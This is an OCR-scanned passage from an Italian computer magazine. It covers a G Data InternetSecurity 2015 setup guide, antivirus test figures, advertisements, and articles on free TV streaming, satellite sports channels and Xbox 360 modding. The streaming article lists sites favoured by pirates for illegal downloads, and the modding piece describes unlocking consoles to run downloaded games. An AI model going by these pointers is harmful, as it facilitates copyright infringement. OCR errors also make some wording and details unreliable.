i file.___ 0%/0,001% 


ITEST DI WIN MAGAZINE 


ANALISI DI QUASI 300.000 VIRUS 

Per quattro settimane,abbiamo sottoposto a test se¬ 
verissimi le funzioni antivirus di programmi e app per 



la sicurezza. Sono stati utilizzati complessivamente 
294.307 virus, impiegandone 10.231 per infettare i 
PC usati per il test. L'aspetto importante non era il 
corretto riconoscimento dei virus, bensì verificarne 
la loro efficace rimozione. 


OLTRE 2.500 ORE DAVANTI AL PC 

I programmi antrvirus, si sa, rallentano la velocità del 
computer. Per quantificare il reale consumo di risorse 
di sistema abbiamo tenuto sotto controllo questo 



aspetto su otto PC per oltre due settimane. Sono stati 
eseguiti svariati benchmark, sono stati analizzati i 
tempi necessari per le copie di riserva ed è stata 
bloccata la possibilità di richiamare pagine IntemeL 


Installa e attiva la suite di sicurezza 


Ecco la procedura da seguire per configurare la versione a 180 giorni di G Data InternetSecurity 2015. 
Al termine è necessario attivare via Internet il programma per usare tutte le sue funzioni senza limiti. 




^ Una semplice installazione 

Scompattiamo l’archivio GDafazip che trovia¬ 
mo nell'Interfaccia principale del DVD-Rom 
ed eseguiamo il file £XEcontenuto al suo interno. Nel¬ 
la prima schermata del Wizard di installazione selezio¬ 
niamo l’opzione Installazione standard e clicchiamo 
Avanti per proseguire, 


^ Attiviamo la nostra conia 

Clicchiamo sul pulsante Accetta & Installa 
per proseguire con la procedura di installa¬ 
zione completamente automatica e che durerà soltanto 
pochi minuti. Al termine, clicchiamo sul pulsante Attiva 
versione di prova e, quando richiesto, clicchiamo Esci 
per riavviare il computer. 


^ Aggiornamento in corso 

3 Al successivo riavvio di Windows clicchiamo 
due volte sull’icona di G Data intemetSecu- 
rity 2015 nella System tray per awiare il pannello di 
controllo della suite. A destra selezioniamo Prossimo 
aggiornamento e poi Aggiorna database virus. Ai ter¬ 
mine, clicchiamo Chiudi. ► 


Speciali Win Magazine 25 









































































A scuola di hacker 


| Faldate | Antivirus 2015 gratis per te 


FUNZIONI 
DI PROTEZIONE 


ECCO COME METTERE AL SICURO IL NOSTRO PC 

Diamo uno sguardo all'Interfaccia principale di G Data InternetSecurity 2015 
per conoscere e imparare ad utilizzare al meglio i principali comandi. 


PROTEZIONE ANTIVIRUS 

Da qui è possibile eseguire una 
scansione completa del computer o sapere 
quali sono i file in quarantena 

Pagina 45 




FIREWALL 

Permette di configurare un vero e 
proprio sistema di sicurezza contro ogni 
intrusione non autorizzata al computer 

Pagina 46 





□ PROTEZIONE MINORI 

Grazie al parental control è possibile 
proteggere i nostri bambini dai contenuti 
inadeguati pubblicati su Internet 

Pagina 46 



AUTOSTART MANAGER 

È possibile configurare Microsoft 
Windows scegliendo quali applicazioni 
caricare all'avvio e quali no 

Pagina 47 




(D 


SecurityCenter 

Vi sono avvisi •- 


&} iProtezione in tempo reale:! 

Attivo (tutti i moduli) 

Scansione in modo inattivo: 

In pausa 

(V) Firewall: 

Protezione normale 

(v f ) Protezione Web: 

Attivo 

(^j Verifica e-mail: 

Attivo 

@ Protezione da spam: 

Attivo 

Licenza: ancora 180 giorno/i (prova) 


Sif Acquista ora... 

Cosa accade alla scadenza della licenza? 


UCEWZA 

Indica il periodo di validità 
del software. Qualche giorno 
prima della scadenza, un 
messaggio ci ricorderà di 
rinnovare la registrazione 
del software 


EFFETTUIAMO UNA PRIMA 

rri Terminata l'installazione e l'attivazione 
I ^ I della suite di sicurezza è opportuno ef¬ 
fettuare un primo controllo del sistema per 
individuare e debellare eventuali virus e mal- 
ware che si nascondono tra le cartelle e i file 
dell'hard disk. La procedura da seguire è sem¬ 
plicissima e al termine avremo la certezza di 
un sistema "pulito" e sicuro. Avviamo il Pan¬ 
nello di controllo di G Data InternetSecurity 
2015 cliccando due volte sull'icona della sui¬ 
te che troviamo nella system tray di Windows, 
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STATO 


Da qui è possibile monitorare il corretto 
funzionamento dell’antivirus 


IMPOSTAZIONI 


rnetSecurity 2015 


_ X 


Cuccando su questo pulsante 
accediamo a tutti i menu di 
configurazione della suite G Data 


0 


o m 


I database antivirus sono aggiornati 

Ultimo aggiornamento: 22/07/2014 

0 Prossimo aggiornamento: 53 Minuti 


C 


LOG 

in ogni momento è possibile avere 
un resoconto dettagliato sull’attività 
dell’antivirus e degli altri moduli della 
suite 


AGGIORNAMENTI 

Basta un clic per scaricare le nuove 
firme dei virus 



Messaggi 



Aggiornamento del programma disponibile! 


MESSAGGI 




Permettono di ricevere costantemente 
informazioni sulla sicurezza del 
computer e altre utili notizie inviate 
direttamente da G Data 


SCANSIONE DEL NOSTRO HARD DISK 


vicino all'orologio di sistema. Spostiamoci 
quindi nella sezione Protezione antivirus e 
d icchiamo su Verifica computer (tutti i dischi 
fissi locali). Partirà automaticamente la scan¬ 
sione di tutti gli hard disk installati nel PC. La 
procedura potrebbe richiedere molto tempo 
e consumare parecchie risorse di sistema. 
Conviene quindi eseguirla quando non uti¬ 
lizziamo il PC: in questo caso, attiviamo la 
voce Spegnere il computer dopo la scansio¬ 
ne virus (se non è stata rilevata alcuna infe¬ 


zione). Nella stessa schermata di controllo 
della scansione spuntiamo, inoltre, anche 
l’opzione In caso di carico del sistema, so¬ 
spendere la scansione cosi da evitare even¬ 
tuali surriscaldamenti o blocchi del sistema. 
Qualora venissero individuati virus o altre 
minacce, G Data InternetSecurity 2015 ci 
suggerirà come procedere: nella schermata 
di rimozione sarà sufficiente selezionare 
l'Azione consigliata per eliminare il virus o 
spostarlo in quarantena. 
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NESSUNO PUÒ ENTRARE DI NASCOSTO NEL MIO COMPUTER 


Il Firewall integrato nella suite G Data 
InternetSecurity 2015 è attivato di de¬ 
fault. Possiamo comunque personalizzarne 
il funzionamento per adattarlo alle nostre 
esigenze. Dalla schermata principale del mo¬ 
dulo dicchiamo su Protezione e poi su Mo¬ 
difica impostazioni di sicurezza nel menu 
contestuale che appare. Nella nuova scher¬ 
mata possiamo scegliere la Creazione ma¬ 
nuale delle regole oppure lasciare attivo il 
Modo Pilota automatico: nel primo caso, il 


firewall ci chiederà quale azione intrapren¬ 
dere ogni qualvolta verrà individuato un 
tentativo di intrusione nel nostro sistema. Il 
Pilota automatico, invece, procederà in to¬ 
tale autonomia. Dalla sezione Livelli di pro¬ 
tezioneautomatici, invece, possiamo sce¬ 
gliere l'opzione Firewall disattivato (ovvia¬ 
mente non consigliata) oppure scegliere il 
livello di protezione preferito, scegliendo un 
buon compromesso tra un efficace controllo 
e una buona libertà di navigazione su Internet. 




0 Bambini protetti su Internet 

Impariamo a configurare correttamente il parental control di G Data InternetSecurity 2015 per fare in modo che i 
nostri figli possano navigare al sicuro da contenuti Web non adatti alla loro età. 



Un account per ogni figlio 

•|| Per usare il modulo Protezione minori è 
opportuno creare un account di Windows per 
ogni utente. Possiamo farlo dal menu Starti Windows 
selezionando Pannello di controlla/Account utente e 
protezione famiglia/Account utente oppure diretta- 
mente da G Data ciccando Nuovo utente 



^ Ad ognuno il suo accesso 

2 In Aggiungi nuovo utente scegliamo un 
Nome utente assegniamogli una Password, 
digitiamola per sicurezza anche in Ripeti password e 
dicchiamo Applica. Ripetiamo la procedura per ogni 
nostro figlio. Il modulo di protezione verrà automatica- 
mente attivato su questi nuovi utenti. 



Filtri su misura 

Tornati nella schermata di Protezione bam¬ 
bini selezioniamo l'account da proteggere dal 
menu a tendina Utente. Il modulo risulta già configura¬ 
to: se vogliamo personalizzarlo ulteriormente, cicchia¬ 
mo su una delle voci presenti (ad esempio Contenuti 
proibiti) e poi su Modifica. 



^ Blocchiamo altri contenuti 

^ In Selezione dei contenuti proibiti sono già 
selezionate le categorie di contenuti Web 
potenzialmente pericolosi per i minori. Per creare un 
Filtro personalizzato dicchiamo Nuovo, scegliamo 
una Denominazione e la categoria di appartenenza 
(nel nostro caso: Contenuti proibiti). 


^ Ricerche impossibili 

g Cucchiamo OK. In Modifica dei contenuti 
proibiti diamo un nome al Filtro. Da Luogo 
perla ricerca spuntiamo le opzioni per bloccare le 
ricerche on-line in base all'lIRL, al Titolo della pagina 
Web o al suo contenuto e cicchiamo Aggiungi. Con¬ 
fermiamo le modifiche con Applica e OK. 


L'uso dei PC è limitato 

g Possiamo anche limitare l'uso del computer o 
di Internet ai nostri figli. Cicchiamo, ad esem¬ 
pio, su Monitorare il tempo di utilizzo di Internet e 
poi Modifica. Spuntiamo Monitoraggio del tempo e 
impostiamo le ore e i minuti di utilizzo massimo per 
ogni giorno, settimana o mese. 
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® Windows al fulmicotone 

Grazie aH’Autostart Manager del software è possibile configurare le applicazioni che vengono 
caricate automaticamente da Windows, cosi da ottimizzare la fase di boot del PC. 
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^ L’elenco dei programmi 

Spostiamoci nella sezione Autostart Manager e con¬ 
centriamo la nostra attenzione sull'elenco di programmi 
in Autostart senza ritardo, sono tutti quelli che vengono caricati 
all’avvio di Windows rallentando inutilmente il sistema. Selezio¬ 
niamo quello che non ci interessa e cucchiamo sulla freccia blu 
verso destra. 


± Esecuzione ritardata 

Spostiamoci in Autostart con ritardo, per ogni software 
aggiunto a questo elenco sarà disponibile la voce Ritar¬ 
do. Cucchiamo sul menu a tendina corrispondente e selezionia¬ 
mo il ritardo con cui avviare il programma stesso: Non avviare 
ne bloccherà completamente l’esecuzione automatica. Al termine 
cicchiamo Salva. 



Cancellazioni sicure 


Insieme alla suite G Data viene installato anche il tool Shredder che permette di eliminare file e 
cartelle dal disco in maniera sicura, impedendo ogni tentativo di recupero. Ecco come utilizzarlo. 


□ Proprietà - G Data Shredder 
Impostazioni 
Opzioni 

f7( Mostra G Data Shredder sul desktop 
V E segri rumore del tritadocumenti 

Protezione 

Numero di passaggi di eliminazione: 5 




OK j Amila ^ipkca 



E-MAIL SENZA 
SPAZZATURA 


Come ogni buona suite 
che si rispetti, anche G 
Data InternetSecurity 
2015 integra un ottimo 
modulo antispam, che 
si attiva automatica- 
mente al primo avvio 
deil'antivirus. I filtri 


predefiniti riescono a 
bloccare praticamente 
tutta la spazzatura pro¬ 
veniente dal Web, ma 
è possibile comunque 
personalizzarli ulterior¬ 
mente o configurarli 
secondo le proprie esi¬ 
genze. Dal Pannello di 
controllo della suite 
dicdiiamo impostazio¬ 
ni, spostiamoci nella 
sezione Antispam e, 
nella relativa scherma¬ 
ta, definiamo le moda¬ 
lità di filtraggio delle 
e-mail ricevute con il 
proprio dient di posta 
elettronica. 


UN BACKUP DELLE 
IMPOSTAZIONI 

G Data InternetSecurity 
2015 permette di creare 
unbackupdeifile di 
configurazione, così da 
ripristinarli velocemen¬ 
te in seguito ad una 
nuova installazione del 
software. Per crearlo, 
dal Pannello di control¬ 
lo della suite cucchiamo 
su Impostazioni. 

Nella nuova schermata 
premiamo il pulsante 
in alto a destra Salva 
impostazioni. Sceglia¬ 
mo dove archiviare il 
file GDataSettings.gds 
e cucchiamo So/vn. Per 
ripristinarlo basterà, 
ovviamente, cliccare sul 
pulsante Carica impo¬ 
stazioni. Con Ripristina 
impostazioni, invece, 
possiamo riportare la 
suite alla configurazio¬ 
ne di default. 


^ Attiviamo il “tritatutto” 

■J Terminata l’installazione della suite G Data InternetSecuri- 
ty 2015, sul Desktop di Windows comparirà l’icona G Data 
Shredder. Ciccandoci sopra due volte apparirà la sua semplice inter¬ 
faccia grafica. Lasciamo i due segni di spunta sulle voci presenti 
all’Interno della sezione Opzioni. 


Cancellazione in corso 

2 I Scegliamo il Numero di passaggi di eliminazione (cioè 
quante volte i file verranno sovrascritti per cancellarne ogni 
traccia): quanto più è alto, tanto più difficile sarà il recupero. Cucchia¬ 
mo OK. Basta ora trascinare un file sull’icona di Shredder per can¬ 
cellarlo definitivamente! 
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TRUCCHI VELOCI PER G DATA INTERNETSECURITY 2015 



Dopo l’installazione di G Data Intemet- 
Security 2015 alcuni programmi non 
riescono più ad accedere al Web. Cosa 
può essere successo? 

È probabile che il firewall integrato nella suite 
G Data abbia modificato i permessi di esecu¬ 
zione del programma bloccando di fatto l’ac¬ 
cesso a Internet. Avviamo il Pannello di con¬ 
trollo della suite e accediamo alla sezione Fire¬ 
wall. Nella schermata che appare, verifichiamo 
che la voce Radar applicazioni sìa imposta¬ 
ta su Nessuna applicazione bloccata. In ca¬ 
so contrario, cucchiamoci su e poi selezionia¬ 
mo Apri Radar applicazioni Quindi, nell'elen¬ 
co che appare individuiamo l'applicazione che 
non accede più a Internet, selezioniamola e cuc¬ 
chiamo su A/forizza. 



spostate nel cestino e la mailbox vena comple¬ 
tamente ripulita. 



UNA PASSWORD 
PER LA SUITE 


«. Of interi 


« * 




oa 


@ 

0 * * »— 
0 

0 — 
0 —* 



RIPULIRE LA MAILBOX 
DAI VIRUS 


Una scansione eseguita con G Data In- 
temetSecurity ha rilevato un virus nel file 
Outlook.pst, che però non è stati rimosso. 
Ho allora provato a spostare il file in qua¬ 
rantena, ma cosi facendo non riesco più 
ad accedere alle mie e-mail. Come faccio 
a sbarazzarmi del virus senza perdere i 
miei messaggi di posta? 

Il file PST rappresenta l'intero archivio di posta 
elettronica gestito da Outlook: spostandolo in 
quarantena eliminiamo, di fatto, tutta la posta 
scaricata dal Client. Non serve, quindi, esegui¬ 
re una scansione su tutto il database, ma sul¬ 
le singole e-mail. Per risolvere il problema, av¬ 
viamo Outlook: nella barra dei menu dovrebbe 
essere presente la toolbar di G Data Intemet- 
Security 2015. Clicchiamo quindi sul pulsan¬ 
te Verìfica cartella. L'antivirus avvierà un con¬ 
trollo approfondito di tutta la Mailbox: eventuali 
messaggi infetti verranno individuati e segnala¬ 
ti prontamente. Per eliminarli, selezioniamoli e 
clicchiamo Elimina. Le e-mail infette verranno 


Il mio computer viene utilizzato da più 
persone e ho il timore che qualcuno, anche 
involontariamente, possa modificare la 
configurazione di G Data IntemetSecurity 
2015 esponendo cosi i miei dati a virus e 
malware di ogni genere. Posso proteggere 
l’accesso alla suite con una password? 

È sempre buona norma proteggere l'accesso 
alla suite di sicurezza con una password. È pos¬ 
sibile farlo anche con G Data IntemetSecurity 
2015. La procedura da seguire è semplicissi¬ 
ma. Dal Pannello di controllo della suite (av¬ 
viabile cliccando due volte sull'Icona che ap¬ 
pare nella System tray, vicino all'orologio di si¬ 
stema) clicchiamo su Apre le impostazioni (il 
pulsante a forma di ingranaggio in alto a de¬ 
stra). Nella nuova schermata spostiamoci nella 
sezione Generale e clicchiamo su Password. 
Compiliamo quindi i campi Password e Ripe¬ 
tere la password con una chiave di accesso 
a nostra scelta. Nel campo Nota sulla pas¬ 
sword indichiamo una domanda segreta al¬ 
la quale solo noi sappiamo rispondere e che ci 
verrà posta qualora, effettuando in futuro l’ac¬ 
cesso al pannello di controllo della suite, doves¬ 
simo dimenticare la chiave di accesso, aiutan¬ 
doci così a ricordare la password. Quindi, clic¬ 
chiamo Applica e OK per tornare al pannello 
di controllo della suite. 


ilC- 





□ UN FIREWALL 
SU MISURA 

È possibile personalizzare il funzionamento 
del firewall di G Data InteretSecurity 2015 
per monitorare l’accesso a Internet dei 
programmi installati nel computer? 

La suite G Data offre una configurazione prede¬ 
finita del firewall che garantisce già una prote¬ 
zione efficace contro eventuali accessi non au¬ 
torizzati al sistema. È comunque possibile per¬ 
sonalizzare il funzionamento del programma se¬ 
condo le proprie esigenze. Dal Pannello di con¬ 
trollo della suite clicchiamo su Apre le impo¬ 
stazioni (l’icona a forma di ingranaggio in atto 
a destra) e, nella schermata che appare, spo¬ 
stiamoci nella sezione Firewall . Quindi, in Pilota 
automatico, attiviamo la voce Creazione ma¬ 
nuale delle regole, il firewall chiede all’utente. 
In questo modo, ogni volta che un programma 
tenterà di accedere a Internet, il firewall chiede¬ 
rà all'utente di fornire o meno l'autorizzazione. 



NIENTE 
NELLA PO! 


RA 


Capita di ricevere e-mail di spam nono¬ 
stante il filtro per il controllo della posta 


elettronica sia attivo. Come fare a bloccare 
questi messaggi spazzatura dalla maifoox? 

Gli spammer e i pirati informatici cercano sem¬ 
pre nuovi modi per invadere le nostre caselle di 
posta elettronica con inutili e-mail spazzatura. Il 
filtro antispam di G Data IntemetSecurity 2015 
viene costantemente aggiornato con l'elenco di 
nuove parole chiave che permettono di identi¬ 
ficare correttamente lo spam, ma ovviamen¬ 
te non è possibile avere un controllo preciso al 
100%. Possiamo però intervenire manualmen¬ 
te aggiungendo manualmente a questo elenco 
le keyword che riteniamo opportune. Dal Pan¬ 
nello di controllo della suite clicchiamo su Apre 
le /mposfaz/on/(l'icona a forma di ingranaggio 
in alto a destra) e, nella schermata che appare, 
spostiamoci nella sezione Antìspam/Filtm an¬ 
tispam. Clicchiamo su Usa parole chiave (te¬ 
sto messaggio). Nella finestra che appare clic¬ 
chiamo Nuovo e aggiungiamo la keyword nel 
campo Parola chiave, confermando con OK. m 
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...di avere una palla al piede? 




Computer protetto e finalmente libero di essere veloce con 



‘eScan Anti Virus 


Per sistemi Windows®, Linux e OS X 



Utilizzo medio della memoria RAM 


eScan 1 10 MB 


Messenger 
Altri Anti Virus 
Internet Explorer 9 
Firefox 
Software di grafica 
Giochi ad alta definizione 


| 34 MB 
■ 70 MB 
100 MB 
fg 350 MB 
fM 900 MB 
fJH 2 GB 




^perchè 

eS cari 

"J" 

11 f uo Pq 



Testato e certificato da 



Monitoraggio della rete ■ Protezione drive USB 


Diventa rivenditore di eScan Anti Virus 

partners.escanantivirus.it 


Distributore esclusivo per l'Ilolia. 


I nnovia 

TECHNOLDEV 
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Caldo & film 
sono gratis 




nostro paese: in questo caso è 
sufficiente dotarsi di una para¬ 
bola con doppio occhio (o di 
un modello motorizzato) per 
riuscire a catturare non solo 
il segnale del satellite HotBird, 
ma anche quello proveniente 
da Astra&Co. Senza dire che 
è possibile anche guardare 
tutto il palinsesto di Sky HD 
senza sottoscrivere alcun 
abbonamento, semplice- 
mente acquistando una 
scheda prepagata a prezzi 
di saldo, in maniera legale 
e completamente anonima. 
Insomma la TV è cambiata e 
con essa stanno cambiando 
anche le nostre abitudini di 
telespettatori! 


La principale piattaforma di cinema in streaming attualmente attiva in Italia è quella di CHILI 
(www.chili-tiv.it). Il servizio legale al 100% propone un catalogo sterminato che comprende 
migliaia di film catalogati in tutti i generi cinematografici e permette di avviarne la riproduzione 
pagando solo quello che realmente si 


vede, quindi senza alcun abbonamento. 
Tutti i lettori di Win Magazine hanno 
ora la possibilità di scegliere un film 
tra i 200 titoli disponibili nella sezione 
"Promo perte"della piattaforma on-line 
e guardarlo gratuitamente sul proprio 
computer! 


PER USUFRUIRE DELL'OFFERTA: 

✓ Colleghiamociawww.chili-tv.it 

✓ Creiamo un nostro account 

✓ Scegliamo la Promo per te 

✓ Usiamo il coupon 226779193877 


CHILIH 


S* n’i* 


* t 






App e siti da smanettoni che trasmettono live e 
on-demand tutti gli eventi sportivi e le nuove serie TV 


I l passaggio alla tecnologia digitale 
ha davvero rappresentato una ri¬ 
voluzione nel nostro modo di guar¬ 
dare la TV: i canali disponibili si sono 
moltiplicati a dismisura e i palinsesti si 
sono arricchiti di nuovi e interessanti 
contenuti. Per gustarsi un bel film o la 
propria serie televisiva preferita, poi, 
non è più necessario neanche dispor¬ 
re di antenne, parabole e decoder: è 
sufficiente la nostra connessione a In¬ 
ternet per guardare in streaming tutti 
i contenuti che vogliamo. E non stiamo 
parlando di contenuti illegali: le prin¬ 
cipali emittenti televisive trasmettono 
sui loro portali Web, anche in diretta, 
tutti i loro programmi. Per non parla¬ 
re delle piattaforme video come Chili 
(www.chili-tv.it), che offrono l’accesso 
ad un archivio sterminato di film in 


alta definizione riproducibili a tutto 
schermo sul proprio computer. E sen¬ 
za dimenticare il "solito” YouTube sul 
quale è possibile trovare tanti film gratis 
e contenuti liberi da diritto d’autore, 
quindi riproducibili in totale legalità! 

Tutto lo sport che vuoi 

Anche gli appassionati di calcio, e più 
in generale di sport, hanno numero¬ 
se alternative per guardare gratis le 
azioni di gioco e le imprese dei loro 
beniamini. Sul digitale terrestre, ad 
esempio, è possibile guardare in chiaro 
i principali incontri della Champions 
League, mentre sul satellite non man¬ 
cano le emittenti estere che trasmettono 
in chiaro (in lingua straniera, certo, 
ma è un dazio che si paga volentieri) 
eventi sportivi altrimenti criptati nel 


IL CINEMA DI QUALITÀ SUL TUO PC CON 


CHILI fi 


32 Win Magazine Speciali 
















A scuola di hacker 


• «« 0 D 


You IffìiEi 


Sul portale di video hosting è possibile trovare tanti titoli 
gratis (www.youtube.com/movies) e contenuti liberi da 
diritto d'autore e quindi visualizzabili in totale legalità. 
Sempre più spesso, infatti, YouTube viene utilizzato da au¬ 
tori indipendenti per pubblicare le loro opere e mostrarle al 
pubblico, aggirando il controllo delle case di distribuzione 
cinematografica. Non mancano, poi, trailer in HD e video 
interviste ai nostri attori preferiti! 


ITALIA-FILN °rc, 


FILM5TREAM 


a 


fili iwvr-in.» 


■j Guardasene • net 


STREAMING: I SITI PREFERITI DAI PIRATI 


Come dice il nome stesso, 
il sito è spedalizzato in film 
e serie TV in italiano 


Offre la visualizzazione in streaming di numerosi titoli 
e serie TV in alta definizione 


Sfrutta le reti P2P per consentire l'accesso in streaming 
ad un archivio sterminato di film 


Oltre a film e serie TV, permette al pirata di fare incetta 
anche di libri, software e giochi 


Community italiana che offre il download di uno 
sterminato archivio di contenuti multimediali 


Sito specializzato nello streaming delle principali serie 
televisive senza interruzioni pubblicitarie 


I film sono ordinati per categorie e non mancano 
neanche le serieTVe i cartoni animati 


Forum di discussione su cui è possibile trovare i link 
per il download illegale di film e software 


Tutte le serieTV in streaming e in alta definizione. 
Non mancano film e cartoni animati 


Tutte le ultime uscite cinematografiche e le serieTV 
in streaming e in alta definizione 
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I MERCOLEDÌ 
DI CHAMPIONS 

SOLO SU CANALE 5 < 


CHAMPIONS 

I.F.AOIIF 


FASE A GIRONI OTTAVI QUARTI SEMIFINALI FINALE 


Tutti gli appassionati del grande calcio possono guardare gratis la Champions League sintonizzan¬ 
dosi sull'emittente Canale 5 del digitale terrestre: anche per la stagione 2014/15, infatti, Mediaset 
trasmetterà in esclusiva la miglior partita del mercoledì di Champions. Al termine delle partite, 
inoltre, sarà possibile rivivere tutte le emozioni dei match con i commenti degli esperti che in 
studio rivedranno e analizzeranno le azioni più belle e significative. Il torneo internazionale, al 
momento in piena fase a gironi, si concluderà con la finale del prossimo 6 giugno. Per tutto il 
triennio 2015-2018, infine, la Champions League sarà trasmessa in esclusiva solo su Media- 
set Premium, consentendo così ai tifosi di vedere le partite anche in alta definizione. 


★ ★ LE SQUADRE CHAMPIONS*-* 


l- 


/ 




[ fi GIUGNO 


IL CALCIO IN CHIARO ANCHE SUL SATELLITE 


17/09 

01/10 

22/10 

05/11 

26/11 

10/12 


CANALI SAT VISIBILI 
IN CHIARO SU ASTRA&C0. 


Lo spettacolo della Champions League per la stagione 2014-2015 continua anche sui canali satellitari di 
Sky, che detiene i diritti criptati esclusivi, mentre i diritti in chiaro rimangono a Mediaset (che trasmette sul 
digitale terrestre). Soltanto la finale e le eventuali gare di semifinale del martedì che dovessero coinvolgere 
club italiani saranno trasmesse in diretta sia da Mediaset (in chiaro) sia da Sky (criptate).Tutti gli appas¬ 
sionati di calcio, comunque, possono orientare la propria 
parabola anche sugli altri satelliti, come Astra, per catturare 
il segnale di altre emittenti televisive europee che hanno 
acquistato i diritti televisivi per la trasmissione in chiaro delle 
partite. In questo caso, ovviamente, occorre dotarsi di una 
parabola motorizzata, capace di orientarsi automaticamente 
sul satellite HotBird o su Astra, oppure di un doppio occhio 
e poi selezionare sul decoder le frequenze giuste. Le partite, 
ovviamente, avranno una telecronaca in lingua straniera, ma si 
tratta di un piccolo dazio da pagare per vederle senza pagare 
alcun abbonamento. Gli utenti dotati di decoderTivuSat, infine, 
potranno vedere in chiaro, anche sul satellite, le partite tra¬ 
smesse in chiaro da Mediaset. 


EMITTENTE TV 

ORIENTAMENTO 

SATELLITE 

STVESTVHD 

IN, 28,2° est 

UTV/HD 

IN, 28,2° est 

ZDF 

20,19,2° est 

ZDFHD 

1KR, 19,2° est 

ITVEITVHD 

1Ne2F,28,2°est 

2+2 

4A, 4,8° est 


18/02 

25/02 

11/03 

18/03 


15/04 

22/04 


06/05 

13/05 
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SPORT E CALCIO SUL SATELLITE: 
L'ALTERNATIVA ECONOMICA! 


tot? 


SPORT 


Gli appassionati di sport, e di calcio in particolare, dotati di parabola 
hanno una valida alternativa a Sky per l'accesso ai principali eventi 
trasmessi in tutto il mondo. Il famoso operatore televisivo arabo 
beIN Sport (ex Al-Jazeera) offre infatti un interessante pacchetto 
in abbonamento per l'accesso a 29 canali satellitari. La tessera, in 
abbinamento con il decoder ufficiale beIN, abilita la visione dei 
canali di beIN Sports con un bouquet in doppia lingua (inglese 
e arabo) che trasmette le partite di Serie A, Champions League, 

Europa League e tantissimi altri sport! Il decoder incluso nel pacchetto va acquistato una sola volta. Stessa cosa per la 
card: una volta scaduta, basta acquistare un rinnovo e avremo l'accesso a 29 canali diversi, anche in alta definizione: 

BEIN Sports SD 1 -12. BEIN Sports HD1-HD15 • NBA TV* Fox Sport 


L'OFFERTA DI BEIN SPORTS, INOLTRE, GARANTISCE LE SEGUENTI CONDIZIONI: 

✓ Nessun abbonamento da stipulare 

✓ Nessun dato personale da comunicare 

✓ Attivazione e scadenza della carta automatica 
1 ✓ Nessun obbligo di rinnovo alla scadenza 

✓ Nessun obbligo di restituire la smart card alla scadenza 


Bisogna tener presente, però, che per differenziare la sua offerta, beIN Sports trasmette sia su satellite HotBird, sia 
su 25,5°Est, 13°Est e 7°Ovest. Per acquistare il pacchetto, colleghiamoci su www.cesarex.com. 


IL MEGLIO DI SKY HD A 9 EURO 


Con la nascita della Pay TV tutti noi abbiamo avuto la possibilità di accedere ad un palin¬ 
sesto televisivo talmente vasto da accontentare anche i gusti più esigenti. Tra i nume¬ 
rosi vantaggi, però, sicuramente non possiamo annoverare l'economicità degli ab¬ 
bonamenti tradizionali. Esiste però un metodo alternativo che permette di usufruire 
dei contenuti offerti da Sky Italia a cifre davvero incredibili, in maniera assolutamen¬ 
te legale e completamente anonima. Su eBay, infatti, è attivo un mercato decisamente 
dinamico di smart card a basso costo: stiamo parlando delle tessere prepagate che non richiedono 
alcun abbonamento, permettendo così di risparmiare su canoni mensili e su eventuali costi di attivazione/ 
disattivazione. Per l'acquisto non vengono forniti dati personali di alcun tipo (carta d'identità, conto corrente): 
l'unico requisito necessario per usufruire dell'offerta è disporre di un decoder SkyBox (meglio se HD per usu¬ 
fruire delle trasmissioni in alta definizione). Qualora non ne fossimo già in possesso, è possibile acquistarlo 
on-line o presso uno Sky Center ad un prezzo che si aggira sui 50 euro. Un grande vantaggio di questo 
sistema è la possibilità di avere gli stessi pacchetti Sky che sarebbero disponibili con un regolare contratto 
d'abbonamento, ad un prezzo eccezionale! Queste smart card delle meraviglie sono liberamente ac¬ 
quistabili sul noto canale di aste on-line eBay (www.ebay.it) oppure direttamente in un qualunque Sky 
Center. In realtà, più che per una campagna promozionale, le card a basso costo vengono usate dall'ope- 

ratore 
per attirare 
tenzione di 

ckytv Offre la più grande offerta di serie TV, un'infinità di canali per le più possibili clienti 

| svariate passioni (Sport, musica, arte...) e i grandi show di Sky Uno. e cercare così di 

1 fronteggiare la 

t r ltv mici, <* Film senza interruzioni pubblicitarie 24ore su 24,365 giorni all'anno, - • __■ 

I SKY CINEMA ... ur , , . r . . . ». 3 crisi economica 

1 12 canali in HD e le prime assolute cinematografiche. 

responsabile del- 

SKY CALCIO Tutta ' a serie A 201 4/2° 1 5, l'Europa League, le notizie di la riduzione del 

approfondimento e il campionato tedesco in esclusiva Sky. numero di nuovi 

sky sport Tutta la MotoGP e la Formula 1 in esclusiva assoluta, oltre che Basket abbona menti e 

NBA, Tennis, Rugby, Golf, WWE, la Champions League e molto altro. abbonati al servi- 

zio di Pay TV. 


LA DIRETTA SU 
SMARTPHONE 

Non sempre à possibile 
guardare live le 
gare che vedono 
impegnata la nostra 
squadra del cuore. Per 
seguire comunque la 
telecronaca dell'evento, 
possiamo collegard 
al sito www.diretta. 
it. Spostandoci nella 
sezione UVE potremo 
seguire minuto per 
minuto la diretta 
della partita in 
maniera testuale con 
aggiornamenti davvero 
in tempo reale. Una 
soluzione pratica 
per seguire i propri 
beniamini in campo 
anche, ad esempio, 
da smartphone e 
tablet, risparmiando 
così il traffico Internet 
del proprio piano 
tariffario. Certo, le 
telecronache in diretta 
radiofonica di 11 caldo 
minuto per minuto" 
erano altre emozioni, 
ma una telecronaca 
testuale è sempre 
meglio die niente! 
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| Parliamo di... | Console di gioco 


Microsoft Xbox 360: 

la modifica è servita 


“Così sblocco la mia console per giocare ai top title 
scaricati dalla Rete”. Ecco le confessioni di un pirata 


“F 


■ ilo autospellante, stagno, 

■ saldatore, un computer 
e qualche componente 

elettronico; questi a grandi linee 
sono i miei attrezzi di lavoro, in¬ 
separabili compagni di viaggio, e 
che fanno di me un modder pro¬ 
fessionale nel campo dei sistemi 
videoludici. Mi diverto ad aprire 
sistemi chiusi, ad implementar¬ 
li e ad abbattere protezioni har¬ 
dware e software”. Potrebbe essere 


un biglietto da visita per andare 
in cerca di lavoro o un motto per 
pubblicizzarsi, invece è ciò che ci 
ha spiegato un modder professio¬ 
nale di console, che ovviamente 
vuole mantenere l’anonimato, ma 
che ci ha introdotto nel mondo 
dell’hacking delle console, ed in 
particolar modo di quella che as¬ 
somiglia di più, per linguaggio di 
programmazione e performance, 
ad un PC; la Xbox 360. 


Il perché della modifica 

Grazie ad alcune modifiche har¬ 
dware e software le console ven¬ 
gono rese più o meno “Open", ed 
in grado quindi di riprodurre ba- 
ckup di giochi, emulatori di retro 
console, codice “unsigned” ed 
applicazioni di terze parti, create 
da sviluppatori più o meno profes¬ 
sionali. Ecco quindi che si riesce ad 
avere una panoramica riassuntiva 
delle "personalizzazioni" che la 



www.dedoshop.com 

Ecco un esempio di sito 
spedalizzato in modifiche 
e rivendita di hardware 
